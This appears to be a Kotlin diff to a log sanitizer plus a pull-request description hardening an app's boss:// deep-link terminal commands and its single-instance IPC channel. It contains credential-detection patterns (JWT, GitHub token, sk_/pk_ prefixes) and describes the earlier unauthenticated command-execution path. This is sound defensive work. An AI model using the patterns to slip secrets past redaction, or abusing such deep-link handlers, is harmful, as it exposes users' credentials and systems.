+     * pass already replaced keeps the more informative result: `token=/home/me/x`
+     * becomes `token=[PATH]` rather than degrading further to `token=***`.
+     */
+    private val assignmentPattern = Regex("""(?<![A-Za-z0-9_.])([A-Za-z][A-Za-z0-9_.-]*)=([^\s\[][^\s]*)""")
+
+    /** Inserts a word boundary into camelCase names, so `accessToken` splits like `access_token`. */
+    private val camelCaseBoundary = Regex("""(?<=[a-z0-9])(?=[A-Z])""")
+
+    /**
+     * Names whose value is sensitive. Shared by [sanitizeMap] and the
+     * `name=value` pass of [redactLocationsAndCredentials] so that the map path
+     * and the free-text path cannot drift apart; [nameMarksSecret] explains why
+     * free text matches this list more strictly than a map key does.
+     */
+    private val sensitiveValueNames =
+        setOf(
+            "token",
+            "access_token",
+            "refresh_token",
+            "password",
+            "secret",
+            "api_key",
+            "key",
+            "credential",
+            "credential_id",
+        )
+
+    /**
+     * Values kept verbatim even under a sensitive name: they cannot be
+     * credential material, and they answer the question a reader actually has.
+     * `token=null` is a useful thing to read; `token=***` is not.
+     */
+    private val nonSecretValues = setOf("null", "true", "false")
+
     /**
      * Check if a string looks like it might be a token/secret.
      * Used for defensive logging to avoid accidentally logging secrets.
+     *
+     * This is the *value-position* test: the argument is a single datum a caller
+     * chose to log, so mere length is reason enough to mask it here. Message text
+     * is held to the stricter [credentialShapePattern] instead, because a run of
+     * 20-plus characters inside a sentence or a stack frame is usually just a
+     * long identifier.
      */
     fun looksLikeSecret(value: String?): Boolean {
         if (value.isNullOrBlank()) return false
 
-        // Check for common patterns
+        // Check for common patterns.
+        //
+        // A former `^[a-zA-Z0-9_-]{20,}$` alternative is gone: it required a
+        // length of 20 or more, so the first condition below already covered
+        // every string it could match, and it compiled a fresh Regex per call.
         return value.length >= 20 ||
             value.contains("eyJ") || // JWT prefix
-            value.matches(Regex("^[a-zA-Z0-9_-]{20,}$")) ||
             value.contains("sk_") ||
             value.contains("pk_") ||
             value.contains("ghp_") ||
-            value.contains("gho_")
+            value.contains("gho_") ||
+            credentialShapePattern.containsMatchIn(value)
     }
 
     /**
      * Safely format a map for logging, masking known sensitive keys.
+     *
+     * A key is matched against [sensitiveValueNames] by substring: the caller
+     * named this field deliberately, so `userAccessTokenV2` redacts like `token`.
+     * Message text is matched more narrowly — see [nameMarksSecret].
      */
     fun sanitizeMap(map: Map<String, Any?>?): Map<String, Any?> {
         if (map == null) return emptyMap()
 
-        val sensitiveKeys =
-            setOf(
-                "token",
-                "access_token",
-                "refresh_token",
-                "password",
-                "secret",
-                "api_key",
-                "key",
-                "credential",
-                "credential_id",
-            )
-
         return map.mapValues { (key, value) ->
             when {
-                sensitiveKeys.any { key.contains(it, ignoreCase = true) } -> "[REDACTED]"
+                sensitiveValueNames.any { key.contains(it, ignoreCase = true) } -> "[REDACTED]"
                 value is String && looksLikeSecret(value) -> maskToken(value)
                 else -> value
             }
         }
     }
 
-    // Regex patterns for sanitization (compiled once for performance)
-    private val filePathPattern = Regex("""(?:/[^\s:]+)+|(?:[A-Za-z]:\\[^\s:]+)+""")
-    private val urlPattern = Regex("""https?://[^\s]+""")
-    private val emailPattern = Regex("""[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}""")
+    /**
+     * Whether the name of a `name=value` pair marks its value as sensitive.
+     *
+     * Matched per word rather than by substring, which is the one deliberate
+     * difference from [sanitizeMap]'s key test. A map key is a field the caller
+     * named; a name lifted out of arbitrary message text is not, and substring
+     * matching there would mask the value of `KEYBOARD_LAYOUT` for containing
+     * "key". Words are split on the separators [assignmentPattern] admits, plus
+     * camelCase boundaries, so `SUPABASE_ANON_KEY`, `api_key` and `apiKey` all
+     * yield a "key" word while `KEYBOARD_LAYOUT` yields "keyboard".
+     *
+     * The multi-word entries of [sensitiveValueNames] ("access_token",
+     * "credential_id", ...) can never equal a single word; their "token", "key"
+     * and "credential" words do, so nothing is left uncovered.
+     */
+    private fun nameMarksSecret(name: String): Boolean =
+        name
+            .replace(camelCaseBoundary, "_")
+            .split('_', '-', '.')
+            .any { word -> word.isNotEmpty() && sensitiveValueNames.any { word.equals(it, ignoreCase = true) } }
+
+    /**
+     * The shared body of [sanitizeExceptionMessage] and [sanitizeStackTrace].
+     *
+     * The order of the passes is deliberate. Locations go first, and
+     * [filePathPattern]'s `(?:/[^\s:]+)+` consumes everything after a scheme's
+     * colon — so a value carried in a URL query string or fragment, which is the
+     * usual way one reaches a message, is already `[PATH]` by the time the later
+     * passes see the text. Those later passes exist for what that cannot reach:
+     * a credential written into a message on its own, with no URL or path around
+     * it.
+     *
+     * The passes compose in either order because [maskToken] is a fixed point on
+     * its own output at these lengths (`ghp...345` masks to `ghp...345`), so a
+     * value both of them match is masked once in effect.
+     */
+    private fun redactLocationsAndCredentials(text: String): String {
+        val withoutLocations =
+            text
+                .replace(filePathPattern, "[PATH]")
+                .replace(urlPattern, "[URL]")
+                .replace(emailPattern, "[EMAIL]")
+
+        val withMaskedAssignments =
+            assignmentPattern.replace(withoutLocations) { match ->
+                val (name, value) = match.destructured
+                if (nameMarksSecret(name) && value.lowercase() !in nonSecretValues) {
+                    "$name=${maskToken(value)}"
+                } else {
+                    match.value
+                }
+            }
+
+        return credentialShapePattern.replace(withMaskedAssignments) { match -> maskToken(match.value) }
+    }
 
     /**
      * Sanitize an exception message by removing potentially sensitive data.
@@ -275,6 +403,8 @@ object LogSanitizer {
      * - File paths (Unix and Windows)
      * - URLs
      * - Email addresses
+     * - Credentials recognisable by shape: JWTs, GitHub tokens, `sk_`/`pk_` keys
+     * - The value of a `name=value` pair whose name marks it sensitive
      *
      * @param message The exception message to sanitize
      * @return The sanitized message
@@ -283,10 +413,7 @@ object LogSanitizer {
         if (message.isNullOrBlank()) return "[no message]"
 
         return try {
-            message
-                .replace(filePathPattern, "[PATH]")
-                .replace(urlPattern, "[URL]")
-                .replace(emailPattern, "[EMAIL]")
+            redactLocationsAndCredentials(message)
         } catch (ignored: Exception) {
             // Deliberately unlogged: LogSanitizer runs inside the logging pipeline,
             // so logging from here could recurse. The placeholder marks the failure.
@@ -306,6 +433,10 @@ object LogSanitizer {
     /**
      * Sanitize a stack trace by removing file paths and other sensitive data.
      *
+     * Applies the same rules as [sanitizeExceptionMessage], which a stack trace
+     * needs too: the `Caused by:` lines of a trace are exception messages, and a
+     * value quoted into one arrives here rather than there.
+     *
      * @param stackTrace The stack trace string to sanitize
      * @return The sanitized stack trace
      */
@@ -313,10 +444,7 @@ object LogSanitizer {
         if (stackTrace.isNullOrBlank()) return "[no stack trace]"
 
         return try {
-            stackTrace
-                .replace(filePathPattern, "[PATH]")
-                .replace(urlPattern, "[URL]")
-                .replace(emailPattern, "[EMAIL]")
+            redactLocationsAndCredentials(stackTrace)
         } catch (ignored: Exception) {
             // Deliberately unlogged: LogSanitizer runs inside the logging pipeline,
             // so logging from here could recurse. The placeholder marks the failure.


### PR DESCRIPTION
Two entry-point subsystems now decide things they previously took on trust.

## `boss://terminal` commands are decided by where the request came from

`boss://` is registered with the OS, so a terminal link does not only arrive from the
operator's own shell — anything that can ask the OS to open a URL supplies one. The
handler treated every source identically, and `CLISecurityValidator.isValidCommand`
returned `true` for anything without a NUL byte.

A new `DeepLinkOrigin` is carried from each producer through to `handleTerminalLink`:
the OS URL-open handlers and the Windows argv path are `EXTERNAL`, `BossCommand` /
`createBossCLI` (built only from this process's own argv) are `OPERATOR_CLI`, and the
single-instance channel states its origin on the wire. Absent or unknown provenance
maps to `EXTERNAL`, including the multiplatform `expect fun processDeepLink(uri)` and
`CLICommand.OpenTerminal.origin`, so nothing is trusted by omission.

An `EXTERNAL` terminal command asks the operator to confirm the exact command, using
the existing `ConfirmationDialog` pattern. It is confirmation rather than refusal
because the shipped `boss` shim converts the operator's own invocation into a `boss://`
URL and hands it to `open`/`xdg-open`/`start` — the two paths are byte-identical, so
refusing would break the CLI. There is deliberately no "remember this choice" option.
`isValidCommand` is now a shape check: non-blank, ≤ 4096 characters, no ISO control
characters — an embedded newline would otherwise submit lines that were never displayed.

`terminalQueue` holds whole `OpenTerminal` commands instead of a `String` with an
`""`-means-null sentinel, so a cold-start request cannot lose its origin.

**Behaviour change:** `boss terminal -c '…'` through the shim now takes one
confirmation click. Removing that means having the shim forward over the authenticated
channel below with `OPERATOR_CLI`; it is a follow-up, not part of this change.

## The single-instance channel authenticates its peer

`SingleInstanceManager` published an IPC port in a lock file under `java.io.tmpdir`,
acted on any line it received, and decided whether another instance was running by
whether a pid existed.

- The descriptor moved to `BossDirectories.resolve("run")` — `~/.boss/run` — in a
  directory whose 0700 permissions are re-applied every startup, written `CREATE_NEW`
  with 0600 so its contents are never briefly readable by others.
- A 32-byte `SecureRandom` token is required on every connection and compared with
  `MessageDigest.isEqual` before the request is interpreted. `toString()` renders
  `token=<redacted>`, and no log statement takes the token or a formatted request line.
- Liveness is "does something answer on the channel", not "does a pid exist", so a
  pre-created descriptor can no longer keep the app from starting; a stale one is
  reclaimed.
- macOS and Linux use a Unix-domain socket (0600, inside the 0700 directory), so no
  port is published at all. Loopback TCP remains the fallback where `AF_UNIX` is
  unavailable or `sun_path` is too short, and the descriptor records which is in use.
- Reads are bounded (16 KiB per request, 256 B per response) and the existing 10-second
  budget is preserved via a scheduler that closes the channel under a blocked read,
  since a blocking `SocketChannel` has no `SO_TIMEOUT`.

The token proves the peer could read a file in this user's own data root. It does not
identify the program and says nothing about where a relayed URL originated, so the
channel is **not** treated as trusted for terminal commands — `main.kt` states
`EXTERNAL` explicitly.

`ApplicationRestarter`'s comment about the old pid was corrected: the wait is still
needed, but the reason is that the old instance is still answering.

## Verification

- `:composeApp:desktopTest` — 1096 tests, 81 classes, 0 failures (was 1076 in 79)
- `:composeApp:detekt` and `:composeApp:ktlintCheck` — clean, no baseline regeneration
- New: `SingleInstanceChannelTest` (12), `TerminalCommandOriginTest` (8)

## Known, unchanged

`boss://plugin?id=…&action=…` still dispatches from `EXTERNAL` with no gate — that is
the feature's contract, and the action registry's own docs delegate validation to each
handler. `boss://folder`, `file`, `workspace` and `url` are likewise `EXTERNAL`-reachable.
## Log and crash-report sanitizing covers credentials outside a URL

`LogSanitizer.sanitizeExceptionMessage` and `sanitizeStackTrace` applied three patterns —
path, URL, email — while `looksLikeSecret`/`maskToken` sat in the same file used only by
`sanitizeMap`. A credential inside a URL was already covered, because the path rule runs
first and consumes everything after the scheme; one outside a URL was not, so
`token=ghp_…` and `SUPABASE_ANON_KEY=eyJ…` passed through an exception message verbatim.

Both paths now share `redactLocationsAndCredentials`, which **appends** two passes after the
existing three, leaving their order — which is load-bearing, and is now pinned by a test —
untouched:

- one compiled `credentialShapePattern`: a JWT anchored on `eyJ`, `gh[pousr]_`/`github_pat_`,
  and `sk`/`pk` with either separator, each with a left boundary so
  `task_manager_configuration` does not match `sk_`
- a `name=value` pass that masks the value and keeps the name, because the name is what
  makes a report diagnosable

One vocabulary at two strictnesses: a value position may be loose, free text must be
precise. `looksLikeSecret` gains the shape pattern as one more alternative, so it can only
match more — verified differentially over a 33-value corpus: 6 newly match (short
`ghs_`/`ghu_`/`ghr_`/`github_pat_`/`sk-`/`pk-` values that only the length rule had reached),
0 stopped matching. Free text matches sensitive names **per word** rather than by substring,
so `KEYBOARD_LAYOUT=us` is not masked for containing "key". A `null`/`true`/`false` value
stays verbatim under a sensitive name, since `token=null` *is* the diagnosis.

Two incidental cleanups in the same file: the `^[a-zA-Z0-9_-]{20,}$` alternative was dead
(the `length >= 20` rule already covered every string it could match) and was compiling a
fresh `Regex` on every call in the logging hot path; `sanitizeMap`'s name set was also
reallocated per call and is now hoisted.

**Characterization test added, behaviour deliberately unchanged:** the path rule mangles
JDK module-qualified frames — `at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(…)`
becomes `at java.base[PATH]:1136)` — because the `/` after `java.base` starts a path match.
Narrowing the path rule would also stop it redacting relative paths, so this is captured as
a known behaviour rather than fixed here.

### Verification (cumulative for this branch)

- `:composeApp:desktopTest` — **1114 tests, 0 failures, 0 errors, 0 skipped**, 81 classes
  (was 1076 in 79 before this branch); `LogSanitizerTest` 66/66
- `:composeApp:detekt`, `:composeApp:ktlintCheck`, and both `plugin-logging` equivalents —
  green, no baseline edits
- 13 mutations applied and reverted, 13 killed, 18/18 new tests individually proven able to fail